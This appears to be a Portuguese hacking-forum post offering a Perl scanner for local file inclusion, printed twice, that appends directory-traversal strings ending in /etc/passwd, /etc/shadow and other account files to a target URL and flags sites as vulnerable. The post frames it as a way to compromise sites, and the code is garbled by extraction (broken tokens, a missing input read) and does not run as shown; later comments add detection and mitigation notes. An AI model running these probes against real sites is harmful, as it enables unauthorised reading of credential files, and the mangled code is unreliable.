Pra quem gosta de ownar sites com falhas em LFI vo mandar um script em PERL para scann
#! / usr / bin / perl
#
#*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* -*-*-*-*-*-*-*-*-*-*-*-*
# LFI Scanner Full Version
#*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* -*-*-*-*-*-*-*-*-*-*-*-*
#
#
#
# Info:
#
# Código: Perl
# Contato: Bl4ck.Viper
# Email: Bl4ck.Viper Gmail.Com @ & # @ l4ck.Viper Yahoo.Com
#
#
# Descrição:
#
# Local File Include (LFI) Scanner Full & Priv8 Version
# licença Linux e Windows
#
#*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* -*-*-*-*-*-*-*-*-*-*-*-*
use HTTP:: Request;
use LWP:: UserAgent;
# Interactive front end: prints a banner, waits for Enter, then asks for the base URL
# that the probe strings are later appended to.
# NOTE(review): this listing was damaged by machine translation/extraction (spaces
# inserted inside tokens and escapes, braces turned into parentheses, part of the
# input read lost) and is not valid Perl as shown. There is also no
# "use strict; use warnings;" anywhere in the visible script.
print "\ t *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- *-* \ n ";
print "\ t \ t LFI Scanner Full & Priv8 Version \ n";
print "\ t \ t \ t Coded By Bl4ck.Viper \ n";
print "\ t \ t \ t Made In Azarbycan \ n";
print "\ t \ t Versão em Inglês \ n";
print "\ t *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- *-* \ n ";
print "\ n \ n";
print "tPress \ [Enter] para iniciar Scanner ...";
# Reads one line only to pause; the value is not used again in the visible code.
$ esu = <>;
print "\ n \ n";
print "\ t Insert Target (ex: [url = http://www.site.com/index.php?page =] http://www.site.com/index.php?page = [/ url]) \ n ";
print "\ t-alvo:";
# NOTE(review): the right-hand side is missing here; presumably a read from standard
# input that was stripped during extraction -- confirm against an intact copy.
$ host = ;
chomp ($ host);
# Prepends "http://" when the typed value does not already contain it. The pattern is
# unanchored, and the value is otherwise used exactly as typed (no validation).
if ($ host! ~ / http: \ / \ / /) ($ host = "http:// $ host";
print "\ n \ n";
print "\ t *-*-*-*-*-* TRABALHO EM ANDAMENTO *-*-*-*-*-* \ n";
print "\ n \ n";
# Probe strings, each appended to the target URL for one request: a run of "../"
# directory-traversal segments (from one up to roughly fifteen levels) followed by a
# well-known file: etc/passwd, etc/shadow, etc/group, and the etc/security/{group,
# passwd,user} paths (the etc/security locations are AIX account files).
# Detection: in web access logs this shows up as a burst of GET requests from one
# client where a single parameter value is a growing run of "../" ending in one of
# the file names above.
# Mitigation: a page/include parameter should select from a fixed allowlist of names
# instead of being concatenated into a filesystem path.
# NOTE(review): the spaces inside the strings are extraction damage, and one passwd
# entry ("../.. etc / passwd") has also lost the separator before "etc".
@ LFI = ('../ etc / passwd ',
'../../ etc / passwd ',
'../../../ etc / passwd ',
'../../../../ etc / passwd ',
'../../../../../ etc / passwd ',
'../../../../../../ etc / passwd ',
'../../../../../../../ etc / passwd ',
'../../../../../../../../ etc / passwd ',
'../../../../../../../../../ etc / passwd ',
'../../../../../../../../../../ etc / passwd ',
'../../../../../../../../../../../ etc / passwd ',
'../../../../../../../../../../../../ etc / passwd ',
'../../../../../../../../../../../../../ etc / passwd ',
'../../../../../../../../../../../../../../ etc / passwd ',
'../../../../../../../../../../../../../../../.. etc / passwd ',
'.. / etc / shadow',
'../../ etc / shadow ',
'../../../ etc / shadow ',
'../../../../ etc / shadow ',
'../../../../../ etc / shadow ',
'../../../../../../ etc / shadow ',
'../../../../../../../ etc / shadow ',
'../../../../../../../../ etc / shadow ',
'../../../../../../../../../ etc / shadow ',
'../../../../../../../../../../ etc / shadow ',
'../../../../../../../../../../../ etc / shadow ',
'../../../../../../../../../../../../ etc / shadow ',
'../../../../../../../../../../../../../ etc / shadow ',
'../../../../../../../../../../../../../../ etc / shadow ',
'.. / etc / group',
'../../ etc / group ',
'../../../ etc / group ',
'../../../../ etc / group ',
'../../../../../ etc / group ',
'../../../../../../ etc / group ',
'../../../../../../../ etc / group ',
'../../../../../../../../ etc / group ',
'../../../../../../../../../ etc / group ',
'../../../../../../../../../../ etc / group ',
'../../../../../../../../../../../ etc / group ',
'../../../../../../../../../../../../ etc / group ',
'../../../../../../../../../../../../../ etc / group ',
'../../../../../../../../../../../../../../ etc / group ',
'.. / etc / security / group',
'../../ etc / security / group ',
'../../../ etc / security / group ',
'../../../../ etc / security / group ',
'../../../../../ etc / security / group ',
'../../../../../../ etc / security / group ',
'../../../../../../../ etc / security / group ',
'../../../../../../../../ etc / security / group ',
'../../../../../../../../../ etc / security / group ',
'../../../../../../../../../../ etc / security / group ',
'../../../../../../../../../../../ etc / security / group ',
'.. / etc / security / passwd',
'../../ etc / security / passwd ',
'../../../ etc / security / passwd ',
'../../../../ etc / security / passwd ',
'../../../../../ etc / security / passwd ',
'../../../../../../ etc / security / passwd ',
'../../../../../../../ etc / security / passwd ',
'../../../../../../../../ etc / security / passwd ',
'../../../../../../../../../ etc / security / passwd ',
'../../../../../../../../../../ etc / security / passwd ',
'../../../../../../../../../../../ etc / security / passwd ',
'../../../../../../../../../../../../ etc / security / passwd ',
'../../../../../../../../../../../../../ etc / security / passwd ',
'../../../../../../../../../../../../../../ etc / security / passwd ',
'.. / etc / security / user /',
'../../ etc / security / user ',
'../../../ etc / security / user ',
'../../../../ etc / security / user ',
'../../../../../ etc / security / user ',
'../../../../../../ etc / security / user ',
'../../../../../../../ etc / security / user ',
'../../../../../../../../ etc / security / user ',
'../../../../../../../../../ etc / security / user ',
'../../../../../../../../../../ etc / security / user ',
'../../../../../../../../../../../ etc / security / user ',
'../../../../../../../../../../../../ etc / security / user ',
'../../../../../../../../../../../../../ etc / security / user ');
# Scan loop: for every probe string, build "target + probe", send one GET request and
# print a per-probe verdict.
# NOTE(review): the parentheses that open and close this loop and the if/else bodies
# were presumably braces before extraction; the listing does not parse as shown.
foreach $ scan (@ LFI) (
# Plain string concatenation: the probe is appended to whatever was typed as target.
$ url = $ host. $ scan;
$ request = HTTP:: Request-> new (GET => $ url);
# A fresh LWP::UserAgent with default settings is built on every iteration, so the
# requests carry LWP's default "libwww-perl/<version>" User-Agent string -- a simple
# signature to look for in access logs alongside the "../" runs.
$ useragent = LWP:: UserAgent-> new ();
$ response = $ useragent-> request ($ request);
# A hit is reported only when the response status is a success (2xx) and the body
# contains passwd-style "root:x:" text. Every other outcome prints "not found", so a
# negative result from this check is not evidence that the parameter is safe.
# NOTE(review): the string literal after "$ msg =" has lost its quotes.
if ($ response-> is_success & & $ response-> content = ~ / root: x: /) ($ msg = Vulnerável
else ($ msg = "Não encontrado"
# NOTE(review): "$ varredura" is not assigned anywhere in the visible code; it looks
# like the loop variable "$ scan" after machine translation -- confirm.
print "$ varredura ..........[$ msg] \ n";
)
#
#*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* -*-*-*-*-*-*-*-*-*-*-*-*
# LFI Scanner Full Version
#*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* -*-*-*-*-*-*-*-*-*-*-*-*
#
#
#
# Info:
#
# Código: Perl
# Contato: Bl4ck.Viper
# Email: Bl4ck.Viper Gmail.Com @ & # @ l4ck.Viper Yahoo.Com
#
#
# Descrição:
#
# Local File Include (LFI) Scanner Full & Priv8 Version
# licença Linux e Windows
#
#*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* -*-*-*-*-*-*-*-*-*-*-*-*
use HTTP:: Request;
use LWP:: UserAgent;
# Second copy of the same listing (the page repeats the script).
# Interactive front end: prints a banner, waits for Enter, then asks for the base URL
# that the probe strings are later appended to.
# NOTE(review): this listing was damaged by machine translation/extraction (spaces
# inserted inside tokens and escapes, braces turned into parentheses, part of the
# input read lost) and is not valid Perl as shown.
print "\ t *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- *-* \ n ";
print "\ t \ t LFI Scanner Full & Priv8 Version \ n";
print "\ t \ t \ t Coded By Bl4ck.Viper \ n";
print "\ t \ t \ t Made In Azarbycan \ n";
print "\ t \ t Versão em Inglês \ n";
print "\ t *-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- *-* \ n ";
print "\ n \ n";
print "tPress \ [Enter] para iniciar Scanner ...";
# Reads one line only to pause; the value is not used again in the visible code.
$ esu = <>;
print "\ n \ n";
print "\ t Insert Target (ex: [url = http://www.site.com/index.php?page =] http://www.site.com/index.php?page = [/ url]) \ n ";
print "\ t-alvo:";
# NOTE(review): the right-hand side is missing here; presumably a read from standard
# input that was stripped during extraction -- confirm against an intact copy.
$ host = ;
chomp ($ host);
# Prepends "http://" when the typed value does not already contain it. The pattern is
# unanchored, and the value is otherwise used exactly as typed (no validation).
if ($ host! ~ / http: \ / \ / /) ($ host = "http:// $ host";
print "\ n \ n";
print "\ t *-*-*-*-*-* TRABALHO EM ANDAMENTO *-*-*-*-*-* \ n";
print "\ n \ n";
# Probe strings, each appended to the target URL for one request: a run of "../"
# directory-traversal segments (from one up to roughly fifteen levels) followed by a
# well-known file: etc/passwd, etc/shadow, etc/group, and the etc/security/{group,
# passwd,user} paths (the etc/security locations are AIX account files).
# Detection: in web access logs this shows up as a burst of GET requests from one
# client where a single parameter value is a growing run of "../" ending in one of
# the file names above.
# Mitigation: a page/include parameter should select from a fixed allowlist of names
# instead of being concatenated into a filesystem path.
# NOTE(review): the spaces inside the strings are extraction damage, and one passwd
# entry ("../.. etc / passwd") has also lost the separator before "etc".
@ LFI = ('../ etc / passwd ',
'../../ etc / passwd ',
'../../../ etc / passwd ',
'../../../../ etc / passwd ',
'../../../../../ etc / passwd ',
'../../../../../../ etc / passwd ',
'../../../../../../../ etc / passwd ',
'../../../../../../../../ etc / passwd ',
'../../../../../../../../../ etc / passwd ',
'../../../../../../../../../../ etc / passwd ',
'../../../../../../../../../../../ etc / passwd ',
'../../../../../../../../../../../../ etc / passwd ',
'../../../../../../../../../../../../../ etc / passwd ',
'../../../../../../../../../../../../../../ etc / passwd ',
'../../../../../../../../../../../../../../../.. etc / passwd ',
'.. / etc / shadow',
'../../ etc / shadow ',
'../../../ etc / shadow ',
'../../../../ etc / shadow ',
'../../../../../ etc / shadow ',
'../../../../../../ etc / shadow ',
'../../../../../../../ etc / shadow ',
'../../../../../../../../ etc / shadow ',
'../../../../../../../../../ etc / shadow ',
'../../../../../../../../../../ etc / shadow ',
'../../../../../../../../../../../ etc / shadow ',
'../../../../../../../../../../../../ etc / shadow ',
'../../../../../../../../../../../../../ etc / shadow ',
'../../../../../../../../../../../../../../ etc / shadow ',
'.. / etc / group',
'../../ etc / group ',
'../../../ etc / group ',
'../../../../ etc / group ',
'../../../../../ etc / group ',
'../../../../../../ etc / group ',
'../../../../../../../ etc / group ',
'../../../../../../../../ etc / group ',
'../../../../../../../../../ etc / group ',
'../../../../../../../../../../ etc / group ',
'../../../../../../../../../../../ etc / group ',
'../../../../../../../../../../../../ etc / group ',
'../../../../../../../../../../../../../ etc / group ',
'../../../../../../../../../../../../../../ etc / group ',
'.. / etc / security / group',
'../../ etc / security / group ',
'../../../ etc / security / group ',
'../../../../ etc / security / group ',
'../../../../../ etc / security / group ',
'../../../../../../ etc / security / group ',
'../../../../../../../ etc / security / group ',
'../../../../../../../../ etc / security / group ',
'../../../../../../../../../ etc / security / group ',
'../../../../../../../../../../ etc / security / group ',
'../../../../../../../../../../../ etc / security / group ',
'.. / etc / security / passwd',
'../../ etc / security / passwd ',
'../../../ etc / security / passwd ',
'../../../../ etc / security / passwd ',
'../../../../../ etc / security / passwd ',
'../../../../../../ etc / security / passwd ',
'../../../../../../../ etc / security / passwd ',
'../../../../../../../../ etc / security / passwd ',
'../../../../../../../../../ etc / security / passwd ',
'../../../../../../../../../../ etc / security / passwd ',
'../../../../../../../../../../../ etc / security / passwd ',
'../../../../../../../../../../../../ etc / security / passwd ',
'../../../../../../../../../../../../../ etc / security / passwd ',
'../../../../../../../../../../../../../../ etc / security / passwd ',
'.. / etc / security / user /',
'../../ etc / security / user ',
'../../../ etc / security / user ',
'../../../../ etc / security / user ',
'../../../../../ etc / security / user ',
'../../../../../../ etc / security / user ',
'../../../../../../../ etc / security / user ',
'../../../../../../../../ etc / security / user ',
'../../../../../../../../../ etc / security / user ',
'../../../../../../../../../../ etc / security / user ',
'../../../../../../../../../../../ etc / security / user ',
'../../../../../../../../../../../../ etc / security / user ',
'../../../../../../../../../../../../../ etc / security / user ');
# Scan loop: for every probe string, build "target + probe", send one GET request and
# print a per-probe verdict.
# NOTE(review): the parentheses that open and close this loop and the if/else bodies
# were presumably braces before extraction; the listing does not parse as shown.
foreach $ scan (@ LFI) (
# Plain string concatenation: the probe is appended to whatever was typed as target.
$ url = $ host. $ scan;
$ request = HTTP:: Request-> new (GET => $ url);
# A fresh LWP::UserAgent with default settings is built on every iteration, so the
# requests carry LWP's default "libwww-perl/<version>" User-Agent string -- a simple
# signature to look for in access logs alongside the "../" runs.
$ useragent = LWP:: UserAgent-> new ();
$ response = $ useragent-> request ($ request);
# A hit is reported only when the response status is a success (2xx) and the body
# contains passwd-style "root:x:" text. Every other outcome prints "not found", so a
# negative result from this check is not evidence that the parameter is safe.
# NOTE(review): the string literal after "$ msg =" has lost its quotes.
if ($ response-> is_success & & $ response-> content = ~ / root: x: /) ($ msg = Vulnerável
else ($ msg = "Não encontrado"
# NOTE(review): "$ varredura" is not assigned anywhere in the visible code; it looks
# like the loop variable "$ scan" after machine translation -- confirm.
print "$ varredura ..........[$ msg] \ n";
)